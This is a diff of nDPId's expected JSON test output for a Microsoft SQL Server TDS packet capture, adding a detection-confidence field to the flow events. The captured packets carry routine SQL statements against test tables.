 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mssql_tds.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"ts_msec":1240877917888,"pkt":"AAwpiUrKAFBWwAABCABFAADynIJAAEAGGaUKb29vCgAAAQRXBZk+5C72WSFQkoAYAFx5qQAAAQEICgQLsN8AAVvMAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1240877917888,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1240877917888,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1240877917888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1240877917888,"pkt":"AFBWwAABAAwpiUrKCABFAABWA25AAIAGc1UKAAABCm9vbwWZBFdZIVCSPuQvtIAYQa2\/wgAAAQEICgABW8wEC7DfBAEAIgA1AQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
 00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7440000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7440000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="}
 00793{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -26,34 +26,34 @@
 02404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7440000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
